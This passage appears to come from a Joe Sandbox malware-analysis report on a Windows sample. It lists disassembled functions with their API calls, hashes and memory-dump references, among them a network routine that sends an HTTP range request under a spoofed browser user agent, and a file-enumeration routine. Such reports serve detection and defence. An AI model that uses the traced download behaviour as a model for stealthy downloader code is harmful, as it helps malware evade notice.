                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorModule__strdup$FileModeName$AddressExtensionFindHandleLastPathProc
                                                                                  • String ID: NotifyWinEvent$user32.dll
                                                                                  • API String ID: 621541537-597752486
                                                                                  • Opcode ID: 9d45ca5226fbf6339522abbd17fe3b88f48e4d3f0028800783cd3bb072794401
                                                                                  • Instruction ID: a61fa06f3660907b335d31ed0bed361307077f3ff00b488ee75862eb809601c7
                                                                                  • Opcode Fuzzy Hash: 9d45ca5226fbf6339522abbd17fe3b88f48e4d3f0028800783cd3bb072794401
                                                                                  • Instruction Fuzzy Hash: 06018470A142545FDB10EFA5C908A497BEE9F45310B06886AE968D7352EF70DD01CFA6
                                                                                  Function 6A6FDCD0 Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 6A6FDCD5
                                                                                    • Part of subcall function 6A705695: TlsGetValue.KERNEL32(?,6A705821,?,?,6A6D65A5,?,00000104,6A71BAA0,?,6A6D101E), ref: 6A70569E
                                                                                    • Part of subcall function 6A705695: __decode_pointer.LIBCMT ref: 6A7056B0
                                                                                    • Part of subcall function 6A705695: TlsSetValue.KERNEL32(00000000,?,6A6D65A5,?,00000104,6A71BAA0,?,6A6D101E), ref: 6A7056BF
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 6A6FDCE0
                                                                                    • Part of subcall function 6A705675: TlsGetValue.KERNEL32(?,?,6A6FDCE5,00000000), ref: 6A705683
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 6A6FDCF2
                                                                                    • Part of subcall function 6A7056C9: __decode_pointer.LIBCMT ref: 6A7056DA
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 6A6FDCFB
                                                                                  • ExitThread.KERNEL32 ref: 6A6FDD02
                                                                                  • __freefls@4.LIBCMT ref: 6A6FDD1E
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6A6FDD31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                  • String ID:
                                                                                  • API String ID: 4166825349-0
                                                                                  • Opcode ID: 64fe4a7125c26a15adf2077616b6c3a3cfb8bf9c40452a813b08c5a8296d2660
                                                                                  • Instruction ID: 64a1ff115a558abccd135503df791895dbd3f82a4edfe1a47416a053eb8decf5
                                                                                  • Opcode Fuzzy Hash: 64fe4a7125c26a15adf2077616b6c3a3cfb8bf9c40452a813b08c5a8296d2660
                                                                                  • Instruction Fuzzy Hash: AEF0A4B4400200DFCB04ABB1D65C91E3BEAAF4570CB16C564E4158B116DF38EC4BCA50
                                                                                  Function 6A6E39A0 Relevance: 9.2, APIs: 6, Instructions: 235synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6E39D0
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  • _memset.LIBCMT ref: 6A6E39FC
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000001,?,?,?,?,?,?,?,?), ref: 6A6E3A0C
                                                                                  • WaitForSingleObject.KERNEL32(?,00007530,?,00000000,00000000,?,?,?,00000001), ref: 6A6E3AC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocCreateEventHeapObjectSingleWait_malloc_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2881288967-0
                                                                                  • Opcode ID: 7d9230bb53538c01d34883737d6e8b934548cfc775395a24c6726065b4667a22
                                                                                  • Instruction ID: 9e26d0699e6f12c4725226c3e483e5c1b0b419f8ce22f4c7f1d95788d5fb9fce
                                                                                  • Opcode Fuzzy Hash: 7d9230bb53538c01d34883737d6e8b934548cfc775395a24c6726065b4667a22
                                                                                  • Instruction Fuzzy Hash: 258112B12096019FE304CF68CC84B56B7E5FF85324F154A2CE49A8B2A1EF75E909CB94
                                                                                  Function 0046E333 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 0046E338
                                                                                    • Part of subcall function 00472B4F: TlsGetValue.KERNEL32(?,0046E33D), ref: 00472B58
                                                                                    • Part of subcall function 00472B4F: TlsSetValue.KERNEL32(00000000,0046E33D), ref: 00472B79
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 0046E343
                                                                                    • Part of subcall function 00472B2F: TlsGetValue.KERNEL32(?,?,0046E348,00000000), ref: 00472B3D
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 0046E355
                                                                                    • Part of subcall function 0046E2A9: __IsNonwritableInCurrentImage.LIBCMT ref: 0046E2B8
                                                                                    • Part of subcall function 0046E2A9: CloseHandle.KERNEL32(?,?,0046E313), ref: 0046E2DC
                                                                                    • Part of subcall function 0046E2A9: __freeptd.LIBCMT ref: 0046E2E3
                                                                                    • Part of subcall function 0046E2A9: RtlExitUserThread.NTDLL(?,00000000,?,0046E313), ref: 0046E2EC
                                                                                    • Part of subcall function 0046E2A9: __getptd.LIBCMT ref: 0046E2FE
                                                                                    • Part of subcall function 0046E2A9: __XcptFilter.LIBCMT ref: 0046E31F
                                                                                  • __freefls@4.LIBCMT ref: 0046E381
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0046E394
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$CurrentImageNonwritable$CloseExitFilterHandleThreadUserXcpt___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 1364369042-0
                                                                                  • Opcode ID: 92918dbf574e75e616b8db59506508d6b8e8eb69ecca1e6de51603b8f31601c9
                                                                                  • Instruction ID: 2c63338e877e6065032e99ba7fbf3a8c245c052ebece0141bccbaed7ef1ca712
                                                                                  • Opcode Fuzzy Hash: 92918dbf574e75e616b8db59506508d6b8e8eb69ecca1e6de51603b8f31601c9
                                                                                  • Instruction Fuzzy Hash: 5011C4785006419FC708AFB7C959C5A7BA99F45318720805FF5084B363EE3CD883DA5A
                                                                                  Function 0046FEB2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 0046FEB8
                                                                                    • Part of subcall function 00472B4F: TlsGetValue.KERNEL32(?,0046E33D), ref: 00472B58
                                                                                    • Part of subcall function 00472B4F: TlsSetValue.KERNEL32(00000000,0046E33D), ref: 00472B79
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 0046FEC3
                                                                                    • Part of subcall function 00472B2F: TlsGetValue.KERNEL32(?,?,0046E348,00000000), ref: 00472B3D
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 0046FED6
                                                                                  • __freefls@4.LIBCMT ref: 0046FF0C
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0046FF1F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$CurrentImageNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                  • String ID:
                                                                                  • API String ID: 1213517137-0
                                                                                  • Opcode ID: f34a5d0e2f64b1e3d81edd70738cfa1457455fc91348c138eff97b05447bf812
                                                                                  • Instruction ID: 23175a17f92c9035708e6941550d8c5ed6e489cbd063f5f9c2718df5f0a97e00
                                                                                  • Opcode Fuzzy Hash: f34a5d0e2f64b1e3d81edd70738cfa1457455fc91348c138eff97b05447bf812
                                                                                  • Instruction Fuzzy Hash: 490125241007816BC708BFB2D905C4E7F589F52314B24C06FE58847263EA7CD846C69E
                                                                                  Function 0046E2A9 Relevance: 9.0, APIs: 6, Instructions: 44threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0046E2B8
                                                                                    • Part of subcall function 004784B0: __FindPESection.LIBCMT ref: 0047850B
                                                                                  • CloseHandle.KERNEL32(?,?,0046E313), ref: 0046E2DC
                                                                                  • __freeptd.LIBCMT ref: 0046E2E3
                                                                                  • RtlExitUserThread.NTDLL(?,00000000,?,0046E313), ref: 0046E2EC
                                                                                  • __getptd.LIBCMT ref: 0046E2FE
                                                                                  • __XcptFilter.LIBCMT ref: 0046E31F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentExitFilterFindHandleImageNonwritableSectionThreadUserXcpt__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 3342091778-0
                                                                                  • Opcode ID: 8dcf91306e713a2fa630cc9f2cc412dd8a6fd8233650feebf2da47baf20a0a7d
                                                                                  • Instruction ID: 1116f9c278125002f1b6b7d1d883237877c00db81fccb563b58b5edf801ddee5
                                                                                  • Opcode Fuzzy Hash: 8dcf91306e713a2fa630cc9f2cc412dd8a6fd8233650feebf2da47baf20a0a7d
                                                                                  • Instruction Fuzzy Hash: D601F778000601AFD228A7A3EC1EF5E37959F40B24F20455FF001962D2EF7CAC008A1D
                                                                                  Function 0044D0E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConvertDefaultLocale$H_prolog3__memset
                                                                                  • String ID: LI
                                                                                  • API String ID: 1819736550-1013918415
                                                                                  • Opcode ID: b83cb68975bc07a7a812a33b8d86cf74ac0d4755f618c33fd698cf90f188a470
                                                                                  • Instruction ID: 7f7864e48641a18839e182b0d86f02369cade75d530e69d4afd0a2a1a16cfde1
                                                                                  • Opcode Fuzzy Hash: b83cb68975bc07a7a812a33b8d86cf74ac0d4755f618c33fd698cf90f188a470
                                                                                  • Instruction Fuzzy Hash: 96516F71D002289FDB65EF659C41BEEB6B4AF59304F1041EBE548E2281DB788F81CF99
                                                                                  Function 004123A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 004123F0
                                                                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 0041244C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: i
                                                                                  • API String ID: 3850602802-3865851505
                                                                                  • Opcode ID: 2fbdc60ab4b9600b2aa02bb1565c8ce11bada0758e9cde3c4cb7f5c259964f47
                                                                                  • Instruction ID: 185ede2d8dc2f140b292045169d148bd715455c7714af3a1c12bdb094ea2a4cc
                                                                                  • Opcode Fuzzy Hash: 2fbdc60ab4b9600b2aa02bb1565c8ce11bada0758e9cde3c4cb7f5c259964f47
                                                                                  • Instruction Fuzzy Hash: 59514E70A00218DFDB68CB10DE4ABEA7BB5AB19305F1481AAE6045A3D1C7B85DD4CF99
                                                                                  Function 6A6E4C3E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E4CB6
                                                                                  • select.WS2_32 ref: 6A6E4D07
                                                                                  • send.WS2_32(?,?,00000000,00000000), ref: 6A6E4D22
                                                                                  • WSAGetLastError.WS2_32(?,00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 6A6E4D2C
                                                                                  Strings
                                                                                  • GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive, xrefs: 6A6E4CB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_sprintfselectsend
                                                                                  • String ID: GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive
                                                                                  • API String ID: 1308779828-3218760813
                                                                                  • Opcode ID: 1db401b56da420cdd4b4dd5d863b54264790c561f9ae0da5a7910d1c1e9d6755
                                                                                  • Instruction ID: 93aa49c60a125c92b8fb324f2dcf15710e081a1828f6e87d79f307e4065bb8f3
                                                                                  • Opcode Fuzzy Hash: 1db401b56da420cdd4b4dd5d863b54264790c561f9ae0da5a7910d1c1e9d6755
                                                                                  • Instruction Fuzzy Hash: 56319F71609201AFD710DF78C98CA6BB7E6FB88308F05892CE849CB745EB75F9068B50
                                                                                  Function 6A6E4CC7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E4CB6
                                                                                  • select.WS2_32 ref: 6A6E4D07
                                                                                  • send.WS2_32(?,?,00000000,00000000), ref: 6A6E4D22
                                                                                  • WSAGetLastError.WS2_32(?,00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 6A6E4D2C
                                                                                  Strings
                                                                                  • GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive, xrefs: 6A6E4CB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_sprintfselectsend
                                                                                  • String ID: GET %s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: %sRange: bytes=%I64d-Connection: Keep-Alive
                                                                                  • API String ID: 1308779828-3218760813
                                                                                  • Opcode ID: a3c54069fd4be207d446cf73779f22434df5488253038ed8f9c91bdf76d4ec31
                                                                                  • Instruction ID: 9c00bdb487ded9a9cd5c8f9e875faf038d9c342bc3ed3999593635a0fd730609
                                                                                  • Opcode Fuzzy Hash: a3c54069fd4be207d446cf73779f22434df5488253038ed8f9c91bdf76d4ec31
                                                                                  • Instruction Fuzzy Hash: 8B217C7160A241AFD314DFB4CD8CB6BB7E9BB88708F05492CE949D7241EF71E9028B65
                                                                                  Function 00456FE0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoFreeUnusedLibraries.COMBASE(00000000,00000000,?,?,?,0044A6D3,000000FF,00000010,0044AAF1,00000000), ref: 00457024
                                                                                  • __msize.LIBCMT ref: 00457073
                                                                                  • __msize.LIBCMT ref: 00457096
                                                                                  • _malloc.LIBCMT ref: 004570AE
                                                                                  • _malloc.LIBCMT ref: 004570C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __msize_malloc$FreeLibrariesUnused
                                                                                  • String ID:
                                                                                  • API String ID: 553055863-0
                                                                                  • Opcode ID: 5cf0319063ac2db4c1eacb6239eb9efc1d463d41e4f8be98d34b6c172786a9fa
                                                                                  • Instruction ID: 370826939c363dca27f9f242faf4ee67a4340f065dd4b09cc218de279cbd1e03
                                                                                  • Opcode Fuzzy Hash: 5cf0319063ac2db4c1eacb6239eb9efc1d463d41e4f8be98d34b6c172786a9fa
                                                                                  • Instruction Fuzzy Hash: 9421B1315056119FCB25AF25E88195BB7E4AF00B26B11852FEC198B2C3DB3CDC99CB89
                                                                                  Function 0040D840 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0040D872
                                                                                  • _memset.LIBCMT ref: 0040D888
                                                                                  • _sprintf.LIBCMT ref: 0040D8A4
                                                                                    • Part of subcall function 0040D640: FindFirstFileA.KERNEL32(00000000,00000000,?,?,\*.*,?,?), ref: 0040D708
                                                                                  • _memset.LIBCMT ref: 0040D919
                                                                                  • _memset.LIBCMT ref: 0040D92F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$FileFindFirst_sprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1166468719-0
                                                                                  • Opcode ID: 5c690828c2d157d2d57bb139c269eeee58e3b1f83a3dcda2c676c0220d0cf474
                                                                                  • Instruction ID: 6fcc80fdc5726ca6fe2ab70ad81146eb755f0512fae0c0d83e8884a92cc2cc0e
                                                                                  • Opcode Fuzzy Hash: 5c690828c2d157d2d57bb139c269eeee58e3b1f83a3dcda2c676c0220d0cf474
                                                                                  • Instruction Fuzzy Hash: 222179F1D0021C67DB14EBA0DC47FDA73786B18708F4405ADB658662C2F6B59B88CBA6
                                                                                  Function 0040CB77 Relevance: 7.6, APIs: 5, Instructions: 60fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandleWrite_memset_strlen_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 2611559564-0
                                                                                  • Opcode ID: 62c6ccba8791bda8e74f368045aec49a7a8a9d3cca83d1f58f96c388ea5a99b9
                                                                                  • Instruction ID: 1da1c8785b76fbbf931fbfdcf5da11d5436075a266fb121cab687a688915dfe6
                                                                                  • Opcode Fuzzy Hash: 62c6ccba8791bda8e74f368045aec49a7a8a9d3cca83d1f58f96c388ea5a99b9
                                                                                  • Instruction Fuzzy Hash: 06113DB5D00208EFDB04EF94D982BEEB379AF88308F104569E50577382E778AE44CB55
                                                                                  Function 0046FE34 Relevance: 7.5, APIs: 5, Instructions: 40threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0046FE47
                                                                                    • Part of subcall function 004784B0: __FindPESection.LIBCMT ref: 0047850B
                                                                                  • __freeptd.LIBCMT ref: 0046FE61
                                                                                  • RtlExitUserThread.NTDLL(?,?,?,0046FE92,00000000), ref: 0046FE6B
                                                                                  • __getptd.LIBCMT ref: 0046FE7D
                                                                                  • __XcptFilter.LIBCMT ref: 0046FE9E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentExitFilterFindImageNonwritableSectionThreadUserXcpt__freeptd__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 2652032192-0
                                                                                  • Opcode ID: d45c327440b61b3d23720dff9c00b5c4d23028ea6ecc83f8bc426ab26b7d22b7
                                                                                  • Instruction ID: b575a882168ff1582fcdd1fbd5dfcde32446d1c8d3000bc3d3d2bfbd2fe7a219
                                                                                  • Opcode Fuzzy Hash: d45c327440b61b3d23720dff9c00b5c4d23028ea6ecc83f8bc426ab26b7d22b7
                                                                                  • Instruction Fuzzy Hash: CFF08675500605BFDB18B7A2E80DF6F3B65AB40758F10402FB545462A2EF7D9D44C929
                                                                                  Function 6A6FDC46 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
